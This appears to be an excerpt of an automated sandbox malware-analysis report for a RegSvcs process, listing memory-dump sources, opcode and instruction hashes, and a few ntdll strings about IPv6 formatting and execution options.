                                                          • Instruction ID: 89ae9042bf2682483d2d9acb12fc694bbc8b06c4eb662264b723af0c538b627f
                                                          • Opcode Fuzzy Hash: abe0299a07094761020ccf347e1b4d20caa50c4484381c2385958ba68434b124
                                                          • Instruction Fuzzy Hash: 0DF08B312002615BF311910A8C42F773295E7D0251FB5803BE7048B7F1EA71DC818791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8ee3ffc8f69df26c89cf331118136861bba102eef9e9934e20ff535a75f7bf63
                                                          • Instruction ID: cf2c7c2a4a5ffca88bdfb42f5d12a8f6c61c853126bc385cb82362986e44b9fd
                                                          • Opcode Fuzzy Hash: 8ee3ffc8f69df26c89cf331118136861bba102eef9e9934e20ff535a75f7bf63
                                                          • Instruction Fuzzy Hash: 0301A9713006819BF3329B2DDD49F6A37A8BB60B44F8E0556F9018B7F6D778D4028211
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction ID: 45fe9bc95af5326406ecff9421402a8ad207db3fddfae44205db26bf29c8dfc6
                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction Fuzzy Hash: 1CF0E932341A1347EF75AA2E8430B2BA6959FA0910B0D052F9501CBFB0DF30DC118780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction ID: 81df81fbc5671ccb0562433cc7d280b216e9f1017361ab99d3508a7fd43f55c2
                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction Fuzzy Hash: 5AF054337119219BE3219E4EDCC0F97B768AFD5A60F19006AA604AB370C770EC0287E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e90eef787971d8e5a5c1f31df368a3b3710901de969b10bed50283180710a71b
                                                          • Instruction ID: 523a2f66fb3e60825d0b4924b6cad3e6e4122fcda0b6bdd606abcd7dcda89ce1
                                                          • Opcode Fuzzy Hash: e90eef787971d8e5a5c1f31df368a3b3710901de969b10bed50283180710a71b
                                                          • Instruction Fuzzy Hash: 88F08C716053459FD320EF29C881A5AB7E4FFA8710F404A5EB898DB3A4E634E901C796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction ID: 30d717d54254cb964fe379b7040f4341b8a749bb63860842e3440f39f9002e38
                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction Fuzzy Hash: CDF0B472610204AFE724DF26CC01F56B7EDEFA8354F148079A545D7270FAB0ED41C655
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4987efec1d2c311f79229b64b0abd9e04e20287a0316c82f464c2f3ad49f3f2a
                                                          • Instruction ID: fb7ba2060192999cefd15025e78f0cbc9e2c3cdeefcfcf1bb019d515c6309cfa
                                                          • Opcode Fuzzy Hash: 4987efec1d2c311f79229b64b0abd9e04e20287a0316c82f464c2f3ad49f3f2a
                                                          • Instruction Fuzzy Hash: 25F06270A01249DFDB14EF69C595AAEBBB4FF28300F00805AB955EB395DA34EA01CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99e4f597551d09becf94c2f9f4597c3bdfcaa812b720b6c81e4ee27b0071c932
                                                          • Instruction ID: 2dd3ead79d07f3e3c206780033e9e2e4679206e8d78e6778d2018f75b36a6918
                                                          • Opcode Fuzzy Hash: 99e4f597551d09becf94c2f9f4597c3bdfcaa812b720b6c81e4ee27b0071c932
                                                          • Instruction Fuzzy Hash: 7BF0F03D9022D18FE72ACB5CC404BA67BC49B88B20F0C986BC58987672C330D881CA00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fed09e077447c5bfd361687f50507f44f083f974c55da085ae45d303a48eda6
                                                          • Instruction ID: bbf91eb11f7277424ae6e045870ecec5fb51bbeb1c9712f8eb3a7da2cdfeee73
                                                          • Opcode Fuzzy Hash: 8fed09e077447c5bfd361687f50507f44f083f974c55da085ae45d303a48eda6
                                                          • Instruction Fuzzy Hash: 49F027375166C006CF325F2C66942D22F96A7A7010F1A144FDAB15B327CA768887D720
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0aafe111e93b3c61bdb18f93d1ce8b8dadf6596cdfcf72b5b99e1ab3d84a68d
                                                          • Instruction ID: 13b78d7e5f65592da0b700cd107e8aecffec9762c053bb326fad03cd0072ac06
                                                          • Opcode Fuzzy Hash: e0aafe111e93b3c61bdb18f93d1ce8b8dadf6596cdfcf72b5b99e1ab3d84a68d
                                                          • Instruction Fuzzy Hash: 1EF0E9715115519FE322971CC1C4B1277DC9B447A8F08A427D58DC7A72C374FC82C69B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction ID: 4fb301dce61f1ed88fa0276c4500bbaf2b8fa08a8a1b5bfd609a37d83ba1b710
                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction Fuzzy Hash: 91E092723006412BE7229E5A8C80F87776EAFA2B20F04007FB5045E261C9F29D0982A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction ID: 95aecc45be83fff799cd7ebf2a7b07db42d3e526457ffe8242b3fb935c742f31
                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction Fuzzy Hash: 52F030B21042049FE321CF4AD944F52B7F8EB15764F56C02AE609AB771D379EC40CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction ID: 227b8a0540f215ad7883d84168395736e7cb3aedbf3c739f13203e94f9f68bc7
                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb9ce5802e60ec25432a12385c56ae3ab25b525780a1820b0ce0a2c5c61c3f80
                                                          • Instruction ID: 2df02ae97103833d2159954cdfae94f6ef3e31f5076644a3528384dac5547b76
                                                          • Opcode Fuzzy Hash: eb9ce5802e60ec25432a12385c56ae3ab25b525780a1820b0ce0a2c5c61c3f80
                                                          • Instruction Fuzzy Hash: CA90023160540902D1507158445474A500697E0301F95C012A0024659DC7658B5577A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77e8e8f8f372787f897e3879911d6efa4035b7293231966bd5cb49ab54c3a430
                                                          • Instruction ID: c18387b87af4655e6a3a4c01b21c21181239a3ba7969bea47499760f2f056af0
                                                          • Opcode Fuzzy Hash: 77e8e8f8f372787f897e3879911d6efa4035b7293231966bd5cb49ab54c3a430
                                                          • Instruction Fuzzy Hash: 36900225221401020145B558064450F5446A7E63513D5C016F1416595CC73189655321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5971ec58f0e1cc7a8455761a8572bb7c707cfef274954efc547bd657c7ba485d
                                                          • Instruction ID: 59e67b5366300a6ee5db5a65b566212c2c8b1d7a0958fdd4235b278bf4a23652
                                                          • Opcode Fuzzy Hash: 5971ec58f0e1cc7a8455761a8572bb7c707cfef274954efc547bd657c7ba485d
                                                          • Instruction Fuzzy Hash: 2F9002A1201541924500B2588444B0E950697F0301B95C017E1054565CC63589519235
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 280b6c87f9a5a6fc69860c375f0afb2a84656d2f7ced1102aa7bd82bf4f19827
                                                          • Instruction ID: 69c7250343288f630476febfc6a04ce09b0ce7583eb9fe687b79632662678f5b
                                                          • Opcode Fuzzy Hash: 280b6c87f9a5a6fc69860c375f0afb2a84656d2f7ced1102aa7bd82bf4f19827
                                                          • Instruction Fuzzy Hash: 2390022120544542D10075585448A0A500697E0305F95D012A106459ADC7358951A231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8e69be0d003d7397fa1f4562923d715592a3c9f797e5956fd03b56dc004f2887
                                                          • Instruction ID: 679d0a5e23eb3a0fb00898020766afd7f2bc54152d9740fddde541f3593494a0
                                                          • Opcode Fuzzy Hash: 8e69be0d003d7397fa1f4562923d715592a3c9f797e5956fd03b56dc004f2887
                                                          • Instruction Fuzzy Hash: F690023124140502D1417158444460A500AA7E0341FD5C013A0424559EC7658B56AB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94a046589526550101c47cd9220b40cca964036ce304bcddbfd11d4bad38b4db
                                                          • Instruction ID: 35b7c54c73802187eb13aa73c66eeb432a52f3cdf263c8c0cdcae7a2b1cefd02
                                                          • Opcode Fuzzy Hash: 94a046589526550101c47cd9220b40cca964036ce304bcddbfd11d4bad38b4db
                                                          • Instruction Fuzzy Hash: E790023120140942D10071584444B4A500697F0301F95C017A0124659DC725C9517621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ad8fd701df441a180e957952f985ea75cdf7b149ab48aa8f34ef76ce46271a9
                                                          • Instruction ID: 81b3d657223f42bd8620ce6ef9c77ac0029c3b520e67e3d189e7dacd4c3afa0d
                                                          • Opcode Fuzzy Hash: 1ad8fd701df441a180e957952f985ea75cdf7b149ab48aa8f34ef76ce46271a9
                                                          • Instruction Fuzzy Hash: 6190022160540502D1407158545870A501697E0301F95D012A0024559DC7698B5567A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f86f84966fe33bfb462ec7588422edf5412c0a17d63d1c0c7e08a4fb0505ecba
                                                          • Instruction ID: 4dab98694d589e0d05352cb11ffd4f126ef370809ef9e298e4dbbb95c117acce
                                                          • Opcode Fuzzy Hash: f86f84966fe33bfb462ec7588422edf5412c0a17d63d1c0c7e08a4fb0505ecba
                                                          • Instruction Fuzzy Hash: 8C90023120140503D1007158554870B500697E0301F95D412A042455DDD76689516221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 847389ee58734f9fe8a150f064ba7e84f5d4ff268e84f521330f6b84a6d3167a
                                                          • Instruction ID: eb16943289d8abad90ef2806c6673e96faa1db055e269ec752efda1384215a80
                                                          • Opcode Fuzzy Hash: 847389ee58734f9fe8a150f064ba7e84f5d4ff268e84f521330f6b84a6d3167a
                                                          • Instruction Fuzzy Hash: 9990026121140142D1047158444470A504697F1301F95C013A2154559CC6398D615225
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b34f0c72d83733f24c5b659af52e7d72a642815e304fe495334bde1ddfb190c
                                                          • Instruction ID: 7766b0e1e3d049771206136139bbdefec19ef4f3093667efd7c3fce1f6e374c8
                                                          • Opcode Fuzzy Hash: 1b34f0c72d83733f24c5b659af52e7d72a642815e304fe495334bde1ddfb190c
                                                          • Instruction Fuzzy Hash: 3890023120180502D1007158484874B500697E0302F95C012A516455AEC775C9916631
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8232389217b0e2caf284b6a6eab229106b1440fc5ccc0c61fa528ba80a1dfb54
                                                          • Instruction ID: ad3a4e69c6df13c5ba623c7770fe9b652b856bf8377a17c3abc464fb56e5a953
                                                          • Opcode Fuzzy Hash: 8232389217b0e2caf284b6a6eab229106b1440fc5ccc0c61fa528ba80a1dfb54
                                                          • Instruction Fuzzy Hash: A190022130140502D1027158445460A500AD7E1345FD5C013E142455ADC7358A53A232
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f55d0c4aab9bb8525d6f8b6f4a6b3e064dba4ae50b5096bee938d82a6375b8d
                                                          • Instruction ID: f8b48db541e110217a186c76cb59ce24ecfcd8dd2339d7cc8483675b3e1a00ec
                                                          • Opcode Fuzzy Hash: 2f55d0c4aab9bb8525d6f8b6f4a6b3e064dba4ae50b5096bee938d82a6375b8d
                                                          • Instruction Fuzzy Hash: 9590026120180503D1407558484460B500697E0302F95C012A206455AECB398D516235
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33b23337ab849d46b3179d0211d53de75ec726960e22674ae49dca49d507d934
                                                          • Instruction ID: 0e62ac48ac10531bcf002e60ae5c123cb35f91eddfce1a6e3ca2d8d34dafdfeb
                                                          • Opcode Fuzzy Hash: 33b23337ab849d46b3179d0211d53de75ec726960e22674ae49dca49d507d934
                                                          • Instruction Fuzzy Hash: 2B90022120184542D14072584844B0F910697F1302FD5C01AA4156559CCA2589555721
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b511ab8e732195af3d0022fab405a125fb534d530b87d732b5e1eee3b1779a4
                                                          • Instruction ID: d4c749823f0bf1558a786a9bc7ccb91a1ac27249089d3bacb9a34ec627273ab0
                                                          • Opcode Fuzzy Hash: 4b511ab8e732195af3d0022fab405a125fb534d530b87d732b5e1eee3b1779a4
                                                          • Instruction Fuzzy Hash: E290022124140902D1407158845470B5007D7E0701F95C012A0024559DC7268A6567B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: af6a67e170daf3bf9a30e1e2df9c7a83e8b889265ef57169a8f2e60e09820585
                                                          • Instruction ID: 2fe684c59a95232b8fab28181f4f66796a23ded1e89a3efa322ec85a59db2225
                                                          • Opcode Fuzzy Hash: af6a67e170daf3bf9a30e1e2df9c7a83e8b889265ef57169a8f2e60e09820585
                                                          • Instruction Fuzzy Hash: 1C90023160550502D1007158455470A600697E0301FA5C412A042456DDC7A58A5166A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7380734c1fc8a2ac82ba59bbb59aed4f1178ce7773207a40d2fb121883212ff
                                                          • Instruction ID: c1725ea45798b717462f4250579655bad541fd16365f62ef766113a3f666c937
                                                          • Opcode Fuzzy Hash: d7380734c1fc8a2ac82ba59bbb59aed4f1178ce7773207a40d2fb121883212ff
                                                          • Instruction Fuzzy Hash: F090022124545202D150715C444461A9006B7F0301F95C022A0814599DC66589556321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 479799c19adab3e3cdf5c5cfd3f6a8604cd4e8d91ce20ab135307f26080157d7
                                                          • Instruction ID: dc5b81326ddc7d67be9fba1e72c289058f090a79bc9cf654eee001c3da66157f
                                                          • Opcode Fuzzy Hash: 479799c19adab3e3cdf5c5cfd3f6a8604cd4e8d91ce20ab135307f26080157d7
                                                          • Instruction Fuzzy Hash: CE90023520140502D5107158584464A504797E0301F95D412A042455DDC76489A1A221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d968efc941bb843a53202798c133adc95b9b8e8e909bd5a96574191338fe083
                                                          • Instruction ID: 84ed8bb23e9358326c80ca3ec79f104bfa63ddd943832c6197faf882b10a8e56
                                                          • Opcode Fuzzy Hash: 9d968efc941bb843a53202798c133adc95b9b8e8e909bd5a96574191338fe083
                                                          • Instruction Fuzzy Hash: 1B90023120240242954072585844A4E910697F1302BD5D416A0015559CCA2489615321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 5fdf393996877f050de0273f8c36f733eb3a45035e5cc764a9ec24594ea31b37
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: 879f89b06dd60ae6651627fb40c9bd211001e8bf7aeb30812df3d94b43445d27
                                                          • Instruction ID: e2a105272774dab731bb117a1bad8e39f9adaa6e6ab82e4e10e3ad010178941c
                                                          • Opcode Fuzzy Hash: 879f89b06dd60ae6651627fb40c9bd211001e8bf7aeb30812df3d94b43445d27
                                                          • Instruction Fuzzy Hash: B1511471A00645AECB20DF5DC994C7FBBFCEB48201B40882FE496D7661E6F4EA408760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 014A4655
                                                          • ExecuteOptions, xrefs: 014A46A0
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 014A4725
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 014A4742
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 014A4787
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014A46FC
                                                          • Execute=1, xrefs: 014A4713
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
